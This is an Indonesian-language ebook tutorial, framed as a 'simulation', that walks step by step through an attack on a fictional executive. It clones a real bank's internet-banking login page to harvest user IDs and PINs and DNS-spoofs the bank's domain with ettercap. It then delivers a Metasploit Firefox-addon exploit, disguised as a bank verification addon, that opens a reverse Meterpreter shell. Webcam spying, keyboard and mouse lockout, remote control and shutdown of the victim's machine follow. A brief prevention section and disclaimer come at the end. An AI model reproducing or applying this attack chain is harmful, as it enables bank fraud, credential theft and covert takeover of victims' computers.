Anda di halaman 1dari 24

SIMULASI PENYERANGAN PHISING DENGAN MITM DAN

METASPLOIT
INDONESIAN BACKTRACK TEAM

By Muhammad Irfan Sulaiman


I. PENDAHULUAN
Sebelum kita memulai ke materi sebaiknya kita mengetahui terlebih dahulu apa itu
Phising , MITM dan Metasploit .

 Phising adalah suatu bentuk kegiatan penipuan yang dilakukan untuk mendapatkan
informasi penting seperti username, password, PIN dan sebagainya.

Ketika kita sedang melalukan browsing diinternet, kegiatan phising ini sudah tidak
asing lagi. Kenapa? Karna sampai saat ini kegiatan phising masih ada Akibatnya
banyak orang yang kehilangan akun bank miliknya maupun data pribadi tentang
kartu kredit miliknya . Tujuan dari phising ini sangat jelas yakin ingin mencuri data
pribadi korban, entah username atau password korban ataupun identitas kartu kredit
korban .

Sehingga maraknya kejahatan cyber diindonesia faktor utamanya adalah Phising ,


dengan phising ini si attacker dapat melakukan tindakan Carding yakni melakukan
transaksi online dengan kartu kredit orang lain .

Disini saya tidak mengajarkan tentang carding maupun phising attack, tetapi saya
hanya memberikan simulasi sederhana dari phising yang banyak orang abaikan
tentang ancaman tersebut . Diluar dari itu saya tidak bertanggung jawab.

 MITM adalah singkatan dari MAN IN THE MIDLE ATTACK yang artinya
dimana posisi attacker berada ditengah-tengah korban yang sedang melakukan
percakapan, Si attacker ini mempunyai kemampuan untuk menyadap, mencegat,
mengubah , bahkan mengontrol data / pesan diantara korban yang sedang
melakukan percakapan tersebut.

Pada umumnya MITM hampir sama dengan Sniffing yaitu melakukan


penyadapan tetapi ada perbedaan yang sangat mendalam dari MITM dan
SNIFFING . Sniffing adalah salah satu kegiatan passive attack karna si attacker
hanya memantau / menyadap data korba saja tanpa melakukan perubahan-
perubahan terhadap data tersebut. Tetapi kalau MITM berbeda, selain menyadap
MITM dapat melakukan pengubahan data terhadap data yang disadapnya dan
dapat mengontrol penuh atas data tersebut sehingga MITM disebut active attack .

Untuk lebih jelasnya tentang MITM perhatikan scenario berikut tentang serangan
MITM .

Didalam scenario tersebut terdapat 4 tipe serangan, yaitu :

Sniffing: Charlie mengetahui semua pembicaraan antara Alice dan Bob.


Intercepting: Charlie mencegat pesan dari Alice ketika Alice ingin menutup
percakapan dengan “Bob I’m going to sleep, Bye!”. Dengan begini Bob mengira
Alice masih berkomunikasi dengannya.
Tampering: Charlie mengubah jawaban Bob kepada Alice dari account Paypal
bob menjadi charlie.
Fabricating: Charlie menanyakan nomor social security number kepada Bob,
padahal pertanyaan ini tidak pernah diajukan oleh Alice.

Nah bisa anda bayangkan sekarang betapa bahayanya dari serangan MITM ini .

 Metasploit adalah sebuah framework yang digunakan untuk hacking berbagai


jenis aplikasi, sistem operasi, aplikasi web dll . Atau bisa dibilang software yang
diciptakan untuk melakukan exploitasi / hacking .

Di Kali linux atau OS pentest lainnya Metasploit ini sudah terinstall didalamnya .
Bagi yang belum punya metasploit bisa download di http://www.metasploit.com/
II. KASUS
Dalam kasus ini saya akan mensimulasikan penyerangan phising dengan MITM dan
Metasploit.
Disini saya skenariokan Pak Joni adalah salah satu pengusaha migas terbesar diseluruh
ASEAN yang menjabat sebagai Direkur Utama.

Pada suatu hari Pak Joni ingin membeli transportasi darat dan laut di Eropa untuk
keperluan perusahaannya tersebut , Tetapi karna Pak Joni sedang meeting dan pembelian
transportasi tersebut harus cepat dibeli Pak Joni menggunakan system pembelian Online
atau dikenal dengan Online Shop diKantor . Pak Joni melakukan transaksi tersebut
melalui salah satu bank ternama diIndonesia .

Nah setelah Pak Joni melakukan Login ke dalam Internet Banking milik Bank tersebut,
Pak Joni menambah Saldo Rekeningnya dengan mentrasfer Uang dari rekening Bank
yang lainnya ke Rekening tersebut. Beberapa menit kemudian Pak Joni kaget, Karna
Saldo yang ada direkiningnya tersebut habis seketika dan Tiba-tiba laptop Pak Joni hang
dan mati dengan sendirinya .

Berdasarkan scenario diatas saya akan membuat simulasinya bagaimana saldo dari akun
rekeningnya miliknya bisa habis , dan bagaimana tiba-tiba laptopnya bisa mendadak
mati? Ada apa gerangan?

III. STUDI KASUS


Setelah kita mengetahui dari kasus diatas, Saya disini sebagai attacker akan melakukan
serangan Phising dengan MITM dan Metasploit yang dialami seperti Pak Jono .
Disini saya menggunakan OS Kali Linux 1.0.9 dan Targetnya adalah Windows 7
Ultimate 64bit . Saya berada diluar ruang rapat dengan Pak Jono dan Berada didalam satu
jaringan Wifi Kantor .

 Pertama-tama saya akan membuat halaman phising sederhana yang bertujuan untuk
mengelabuhi si target, sesuai dengan kasusnya saya akan membuat halaman Internet
Banking diIndonesia .
Disana terdapat 3 File dan 1 Folder .
-File index.php adalah Tampilan phising dari salah satu halaman web internet
banking Indonesia .
-File post.php adalah file yang berisi pemograman untuk mendapatkan username dan
password dari halaman phising yang direkam difile logs.txt .
-File logs.txt adalah file yang berisi username dan password korban.
-Dan folder index_files adalah folder yang berisi atribut-atribut lainnya agar halaman
phising yang kita buat sama persis dengan halaman aslinya.

Lalu file-file tersebut saya pindahkan ke dalam web server saya, Untuk dikali linux
lokasi web servernya ada di

Didalam folder /var/www tersebut secara default ada file index.html bawaan dari web
servernya, File tersebut boleh kita hapus atau kita ganti namanya . Agar tidak terjadi
konflik dengan file index.php .
Setelah kita pindahkan semua file phising kita, file-file tersebut belum bisa dieksekusi
karna belum ada hak aksesnya .

Lalu kita beri hak akses file tersebut agar dapat dieksekusi dengan perintah :

Dan untuk folder beserta isi-isinya dengan perintah :

Sehingga tampilannya jadi seperti ini yang menandakan bahwa file dan folder kita
sudah diberi hak akses untuk dieksekusi.

 Kedua, Setelah file-file phising kita sudah kita persiapkan lalu kita aktifkan service
web server kita . Dikali linux web servernya menggunakan apache , kita aktifkan
apache kali linux dengan perintah :
Jika OK seperti ini berarti service apache berhasil diaktifkan, jika tidak apache kali
linux anda mengalami masalah.

 Ketiga, Sampai disini kita lakukan uji coba terlebih dahulu dari phising yang kita
buat.
1. Buka browser anda dan masukan diurl “localhost” atau “127.0.0.1” tanpa tanda
petik.

Maka akan terbuka halaman phising yang kita buat tadi .

2. Kita coba isikan USER ID dan PIN , dan setelah berhasil login tersebut akan
dialihkan ke halaman resminya . Ini terserah kita mau dialihkan ke halaman mana saja
tergantu dari kode program phising yang kita buat , dalam hal ini saya alihkan ke
halaman situs aslinya guna untuk mengelabui korban (Pak Jono) .

3. Setelah login, kita cek file logs.txt difolder var/www/ karna file inilah yang
merekam USERID dan PIN tersebut . Dengan perintah “cat logs.txt “ atau bisa juga
dibuka melalui text editor lainnya .
Bisa dilihat digambar diatas berarti halaman phising kita berjalan dengan lancer,
tertulis disana Korban Masuk , USER ID : jonosulityo dan PIN : 123456 . IP
Addressnya dari localhost , Tanggalnya adalah 1 februari 2015 jam 12:50am .

Disini kita baru selesai mengatur halaman phising kita, Kita belum melakukan MITM
dan metasploit lainnya.

 Keempat, Kita lakukan serangan MITM dengan tools dari kali linux yaitu Ettercap.
1.Pertama-tama kita harus melakukan konfigurasi ettercap terlebih dahulu.
File yang perlu dikonfigurasi adalah file etter.dns .

Kita ganti Microsoft.com dengan web internet banking yang akan digunakan
sikorban, dalam kasus ini sebagai target saya menggunakan web ibank.klikbca.com.
dan saya ubah IP tersebut dengan IP saya . Dan kita save dengan perintah “ctrl+x” dan
“Y” lalu “enter” .

2. Kita aktifkan forward IP kita dikali linux dengan perintah :

Perintah ini untuk memberikan nilai 1 atau True kepada ip_forward yang berarti untuk
memberikan perintah aktif pada ip_forward. Untuk mengeceknya lakukan perintah
berikut :

Jika hasilnya 1 berarti sudah aktif dan jika masih 0 lakukan perintah sebelumnya lagi.

 Kelima, Sampai disini ettercap sudah bisa dijalankan tetapi kita persiapkan metasploit
dulu . Metasploit ini berguna untuk mendapatkan akses penuh pada Komputer korban
, yang nantinya selain saya mendapatkan USERID dan PIN pak jono saya juga
mendapatkan akses penuh terhadap komputer pak jono . Ibarat kata sambil menyelam
minum air . hehehe

1.Yap, Jalankan dulu metasploit cukup ketikkan perintah “metasploit” tanpa tanda
petik diterimnal .
2. Metode yang saya akan gunakan dengan metasploit ini adalah dengan Addons dari
browser mozila .
Ketikkan pada console metasploit perintah berikut “use
exploit/multi/browser/firefox_xpi_bootstrapped_addon”
3. Ketikkan perintah “show options” untuk melihat opsi yang dibutuhkan .

Disini yang kita perlu konfigurasi adalah ADDONNAME , SRVHOST , dan


URIPATH.

Saya set ADDONNAMEnya adalah BCA LOGIN VERIFICATION guna untuk


mengelabui si korban. SRVHOST adalah IP saya , dan URIPATHnya adalah login.

4. Kemudian kita akan membuat payload atau bisa dibilang virus, nah virus ini adalah
ujung tombak kita untuk mendapatkan akses penuh terhadap komputer korban.
ketikkan diconsole metasploit perintah berikut : “ set PAYLOAD
windows/meterpreter/reverse_tcp “

Kita cek options apa lagi yang masih kita butuhkan dengan perintah : “show options”
Dan ternyata kita masih membutuhkan konfigurasi LHOST pada payload tersebut,
LHOST ini adalah IP kita yang nantinya si payload akan melakukan back connection
atau koneksi balik di komputer korban ke komputer kita.

Setelah selesai semua kita jalankan metasploitnya, ketikkan “exploit” di console


metasploit.

Disana tertulis USING URL : http://192.168.0.104:8080/login , itu adalah letak virus


saya . Saya hanya butuh si korban mengakses url tersebut , Bagaimana caranya?
Caranya adalah saya hanya perlu mengubah script phising saya agar ketika korban
login akan dialihkan ke url virus tersebut .
 Keenam, Metasploit sudah selesai dikonfigurasi sekarang saatnya jalankan
ettercapnya untuk melakukan MITM .
ketikkan perintah berikut diterminal linux : ettercap –T –q –i wlan0 –P dns_spoof –M
arp // //

-T adalah mode Text .


-q adalah mode quiet .
-i adalah mode interfaces kita, karna saya menggunakan wifi saya pilih wlan0.
-P adalah plugins dalam ettercap saya gunakan dns_spoof.
-M adalah untuk mode MITM , disinilah proses serangan MITM terjadi .
// // adalah jangkauan target .

Saya jelaskan kembali, Jadi ketika pak jono membuka web internet banking tersebut
maka yang pak jono buka adalah halaman phising yang saya buat tadi .
tetapi pak jono tidak bakal curiga, karna url yang dia tuliskan adalah benar alamat dari
internet banking tersebut , karena pak jono sudah terkena serangan MITM saya tadi .
Sehingga yang muncul adalah halaman phising saya .
Lalu Pak Jono memasukkan USERID dan PIN miliknya dan ketika pak jono
mengeklik tombol login yang terjadi adalah pak jono diarahkan ke halaman untuk
menginstall Addon Mozila .

Dan ketika pak jono mengeklik allow maka akan ditampilkan Addon BCA LOGIN
VERIFICATION .
Addon ini tentunya menyakinkan pak tono untuk menginstallnya karna sekilas mata
pak tono tidak curiga bahwa addon ini memang berasal dari pihak bank tersebut . Dan
pak tono pasti beranggapan dengan adanya addon ini transaksi internet banking dia
jadi lebih aman padahal kenyataannya adalah tidak sama sekali .

Sampai disini pak tono berhasil terkena phising dan telah menginstall addon virus
buatan saya. Dan saya mendapatkan USERID dan PIN akun internet bankingnya serta
saya dapat mengontrol komputer pak tono tersebut.
Tentunya pak tono pasti bingung kenapa setelah dia install addon mozilanya tampilan
internet bankingnya tidak muncul? Yang pak tono akan lakukan selanjutkan adalah
membuka kembali halaman internet banking tersebut .

Tapi setelah saya sudah berhasil mendapatkan USERID dan PIN serta Virus saya
sudah masuk ke dalam komputer pak tono tersebut, maka saya hanya perlu
mematikan perintah dari Ettercap yang melakukan MITM tadi.

Jadi ketika pak tono mencoba kembali membuka halaman internet bankingnya yang
akan tampil adalah halaman asli dari pemilik internet banking tersebut.

Disini pak tono melakukan login seperti biasa dan transaksi pada biasanya .
 Ketujuh, kita cek file logs.txt dari phising kita tersebut .

Setelah kita cek dan ternyata berhasil terekam USERID dan PIN pak jono , kita
kembali ke metasploit . Kita cek apakah virus kita sudah benar-benar masuk ke
komputer pak jono apa tidak .

Dan ternyata sudah masuk, Di console metasploit tertulis “meterpreter sessions 1


opened” yang artinya virus saya berhasil melakukan koneksi balik dari komputer pak
jono ke komputer saya .

Lalu jalankan perintah berikut untuk masuk ke sesinya :


Disini saya sudah masuk ke komputer pak jono .

Langkah berikutnya adalah saya akan melakukan migrasi untuk virus saya ke proses
program komputer pak jono yang sedang berjalan. Tujuannya adalah agar virus saya
lebih leluasa untuk mengontrol komputer pak jono tersebut , karna pada defaultnya
virus saya masih menempel diaddon browser mozila milik pak jono Jika browser itu
ditutup oleh pak jono maka virus saya akan hilang dan akan menutup sesi pada
komputer saya .

Sebelumnya saya akan mencari proses program untuk melakukan migrasi virus saya.

Dari gambar diatas, saya akan migrasi ke program svchost.exe dengan PID 468 .
svchost.exe ini adalah program yang dijalankan oleh windows, yang sekiranya virus
saya aman nempel diproses ini.
 Kedelapan, Setelah virus kita aman dengan melakukan migrasi . Kita tampilkan
perintah-perintah yang ada dimetasploit untuk kegiatan lainnya. Dengan perintah
“help”

Disini saya akan mengecek wajah pak tono dengan webcame milik komputer pak
tono. Saya cek terlebih dahulu apakah komputernya memiliki webcame apa tidak .

Dan ternyata ada , lalu jalankan perintah berikut untuk mengaktifkannya.

maka akan terbuka dibrowser kita gambar dari webcame milik pak tono tersebut.
Hehehe .

lalu selanjutnya apa? Saya akan melihat aktifitas apa yang sedang dikerjakan pak tono
didesktopnya .
Dengan perintah “run vnc”.

dan saya juga bisa menonaktifkan mouse dan keyboard milik pak tono , sehingga pak
tono tidak dapat menggerakkan mouse dan mengetik tulisan dikeyboard.
Dengan perintah “ uictl disable mouse” dan “uictl disable Keyboard” . dan untuk
mengaktifkannya kembali cukup ganti disable dengan enable.

Kurang puas dengan itu, saya juga bisa melakukan remote desktop milik komputer
pak jono. Setelah saya nonaktifkan fungsi keyboard dan mouse milik pak jono , saya
lakukan remote desktop komputernya.

Dengan perintah “run getgui –e” yang tentunya ini akan membuat pak tono bingung
kenapa mousenya bisa bergerak sendiri dan komputernya bisa mengetik sendiri ,
padahal yang menggerakkannya dan yang mengetiknya itu adalah saya.

Dan yang terakhir saya lakukan adalah mematikan komputer pak tono melalui
metasploit ini.

Sampai disini komputer pak tono mendadak mati , dan membuat panik pak tono .

Dengan metasploit ini saya juga dapat mendownload dan mengupload file-file penting
milik pak tono ke komputer saya .

Bisa kita bayangkan sekali lagi, betapa bahayanya dari teknik penyerangan ini .
Bermula dari phising hingga virus yang dapat mengontrol penuh terhadap suatu
komputer .
IV. PENCEGAHAN
Untuk mencegah terjadinya serangan seperti yang sudah saya sampaikan sebelumnya ,
Serangan awal yang terjadi adalah PHISING dari serangan inilah berlanjut ke serangan-
serangan yang lainnya.

1. Kita harus lebih teliti dalam membuka suatu halaman website, apakah website itu web
phising atau tidak Terutama untuk website toko online.
2. Untuk seluruh website internet banking biasanya dipasang fiture ssl , ssl atau Secure
socket layer adalah protokol keamanan yang digunakan pada hampir semua transaksi
aman pada internet.

Biasanya ditandai dengan https pada saat membuka web tersebut.


Perhatikan gambar berikut, gambar ini menunjukkan bahwa webtersebut terpasang fitur
ssl dan user untuk mengaksesnya melalui https bukan http . Ini berfungsi
memvertifikasi bahwa web yang kita buka adalah benar-benar web aslinya bukan web
PHISING.

3. Dan untuk mencegah serangan MITM.


Hal yang bisa kita lakukan adalah dengan menggunakan VPN , karna pada dasarnya
MITM dilakukan ketika dalam satu jaringan . Dan VPN (Virtual Private Network)
sendiri adalah Jaringan virtual yang bersifat privat yakni milik kita sendiri sehingga
ketika kita berada dalam satu jaringan publik IP kita berbeda dengan jaringan
sebelumnya karna IP kita berasal dari VPN tersebut. Sehingga serangan MITM tidak
dapat menyerang kita karna kita berbeda jaringan.

Dan ketika ada serangan MITM yang sedang melakukan sniffing, maka website yang
memiliki fitur ssl akan menampilkan pesan error sebagai berikut .

4. Untuk serangan dari Metasploit. Cara yang paling aman adalah dengan menginstal
antivirus, karna pada dasarnya metasploit mengenerate virus .
Dan pastikan antivirus yang anda gunakan adalah Antivirus asli bukan bajakan !
V. PENUTUP
Alhamdulillah selesai sudah simulasi penyerangan phising dengan MITM dan Metasploit ,
Terima kasih kepada ALLAH SWT , keluarga , dan teman-teman Indonesian Backtrack
Lainnya yang membantu saya dalam penulisan ebook ini.

Saya tekankan cerita didalam buku ini hanyalah scenario yang saya buat dan hanya untuk
pembelajaran agar kita lebih waspada terhadap serangan didunia maya terutama dalam
melakukan browsing atau transaksi online diinternet sehingga tidak terkena serangan-
serangan yang ada seperti didalam buku ini. Dan saya sebagai penulis mohon buku ini
dipergunakan secara bijaksana.

Muhammad Irfan Sulaiman

Depok, 1 Februari 2015


VI. DAFTAR PUSAKA
ATTACKING SIDE WITH BACKTRACK (ASWB) v1 - BAB V - MITM ATTACK
ATTACKING SIDE WITH BACKTRACK (ASWB) v1 - BAB X – METASPLOIT
VII. REFERENSI
http://indonesianbacktrack.or.id/
https://indonesianbacktrack.or.id/forum/thread-5821.html?highlight=MITM
http://chaniagorandy.blogspot.com/2011/04/mengenal-serangan-man-in-middle-
mitm.html
http://www.priawadi.com/2012/05/pengertian-spamming-snooping-spoofing.html

Anda mungkin juga menyukai